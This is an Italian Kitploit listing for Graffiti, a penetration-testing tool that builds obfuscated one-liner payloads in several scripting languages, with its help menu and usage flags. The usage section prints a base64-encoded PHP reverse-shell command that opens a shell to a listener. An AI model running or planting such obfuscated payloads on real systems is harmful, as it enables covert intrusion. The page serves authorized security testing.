Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Graffiti — Uno strumento per generare one-liner offuscati per assistere nei test di penetrazione | Kitploit
Strumenti/GitHubGitHub/ekultek/graffiti
Generazione di PayloadShellcodePenetration TestingSviluppo Payload
GitHubekultek/graffiti

Graffiti

Uno strumento per generare one-liner offuscati per assistere nei test di penetrazione

Vedi Repository
180447 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

graffitibanner

NOTA: Non caricare mai i payload su checker online

Graffiti è uno strumento per generare oneliner offuscati per assistere in situazioni di penetration testing. Graffiti accetta i seguenti linguaggi per la codifica:

  • Python
  • Perl
  • Batch
  • Powershell
  • PHP
  • Bash

Graffiti accetta anche un linguaggio non attualmente presente nell'elenco e salva l'oneliner in un database.

Caratteristiche

Graffiti include un database completo che inserisce ogni payload codificato al suo interno, consentendo agli utenti di visualizzare i payload già creati per uso futuro. I payload possono essere codificati utilizzando le seguenti tecniche:

  • Xor
  • Base64
  • Hex
  • ROT13
  • Raw

Alcune caratteristiche di Graffiti includono:

  • Accesso diretto al terminale, con la possibilità di eseguire comandi esterni
  • Possibilità di creare i propri file JSON di payload
  • Possibilità di visualizzare i payload memorizzati nella cache all'interno del database
  • Possibilità di eseguire il database in memoria per una rapida cancellazione
  • Cronologia del terminale e salvataggio della cronologia
  • Completamento automatico tramite tab all'interno del terminale
  • Possibilità di cancellare in modo sicuro i file di cronologia e il file del database
  • Molteplici tecniche di codifica come sopra menzionato

Utilizzo

Graffiti include un terminale integrato; quando non si passano flag al programma, si accede al terminale. Il terminale ha una cronologia, la possibilità di eseguire comandi esterni e i propri comandi interni. Per ottenere aiuto, basta digitare help o ?:

root@kitploit:~

  ________              _____  _____.__  __  .__ 
 /  _____/___________ _/ ____\/ ____\__|/  |_|__|
/   \  __\_  __ \__  \\   __\\   __\|  \   __\  |
\    \_\  \  | \// __ \|  |   |  |  |  ||  | |  |
 \______  /__|  (____  /__|   |__|  |__||__| |__|
        \/           \/           
 v(0.1)               

nessun argomento passato, accesso al terminale, digita `help/?` per assistenza, tutti i comandi che si trovano all'interno di `/bin` sono disponibili nel terminale
root@graffiti:~/graffiti# ?

 Comando                                  Descrizione
---------                                --------------
 help/?                                  Mostra questo aiuto
 external                                Elenca i comandi esterni disponibili
 cached                                  Mostra tutti i payload già presenti nel database
 list/show                               Elenca tutti i payload disponibili
 search <frase>                          Cerca un payload specifico
 use <payload> <codificatore>            Utilizza questo payload e codificalo con un codificatore specifico
 info <payload>                          Ottieni informazioni su un payload specifico
 check                                   Controlla aggiornamenti
 history                                 Mostra la cronologia dei comandi
 exit/quit                               Esci dal terminale e dalla sessione in esecuzione
 encode <tipo-script> <codificatore>     Codifica un payload fornito

root@graffiti:~/graffiti# help

 Comando                                  Descrizione
---------                                --------------
 help/?                                  Mostra questo aiuto
 external                                Elenca i comandi esterni disponibili
 cached                                  Mostra tutti i payload già presenti nel database
 list/show                               Elenca tutti i payload disponibili
 search <frase>                          Cerca un payload specifico
 use <payload> <codificatore>            Utilizza questo payload e codificalo con un codificatore specifico
 info <payload>                          Ottieni informazioni su un payload specifico
 check                                   Controlla aggiornamenti
 history                                 Mostra la cronologia dei comandi
 exit/quit                               Esci dal terminale e dalla sessione in esecuzione
 encode <tipo-script> <codificatore>     Codifica un payload fornito

Graffiti include anche argomenti da riga di comando per quando hai bisogno di un payload codificato rapidamente:

root@kitploit:~
usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
                   [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
                   [-l]
                   [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
                   [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC]
                   [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]

argomenti opzionali:
  -h, --help            mostra questo messaggio di aiuto ed esce
  -c CODEC, --codec CODEC
                        specifica una tecnica di codifica (*default=None)
  -p PAYLOAD, --payload PAYLOAD
                        passa il percorso di un payload da utilizzare (*default=None)
  --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
                        crea un file payload e lo salva in ./etc/payloads (*default=None)
  -l, --list            elenca tutti i payload disponibili per percorso (*default=False)
  -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
                        passa il tuo payload personale da utilizzare per la codifica (*default=None)
  -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
                        passa un indirizzo di ascolto da utilizzare per il payload (se necessario) (*default=None)
  -lP LISTENING-PORT, --lport LISTENING-PORT
                        passa una porta di ascolto da utilizzare per il payload (se necessario) (*default=None)
  -u URL, --url URL     passa un URL se richiesto dal tuo payload (*default=None)
  -vC, --view-cached    visualizza i dati in cache già presenti nel database
  -H, --no-history      non salvare la cronologia dei comandi (*default=True)
  -W, --wipe            cancella il database e la cronologia (*default=False)
  --memory              inizializza il database in memoria invece di un file .db (*default=False)
  -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
                        passa più comandi esterni, consentendo loro di essere accessibili all'interno del terminale; i comandi devono essere nel tuo PATH (*default=None)

Codificare un payload è semplice come questo:

root@kitploit:~
root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
Payload codificato:
--------------------------------------------------

php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'

--------------------------------------------------

Una demo di Graffiti è disponibile qui:

to_video

Installazione

Su qualsiasi sistema Linux, Mac o Windows, Graffiti dovrebbe funzionare senza la necessità di installare pacchetti esterni. Se desideri installare Graffiti come eseguibile sul tuo sistema (devi essere su Linux o Mac per un funzionamento corretto), devi solo fare quanto segue:

root@kitploit:~
./install.sh

Questo installerà Graffiti nel tuo sistema e ti permetterà di eseguirlo da qualsiasi posizione.

Bug e problemi

Se dovessi trovare un bug o un problema, per favore crea una segnalazione con i dettagli qui e grazie in anticipo!

Scarica lo strumento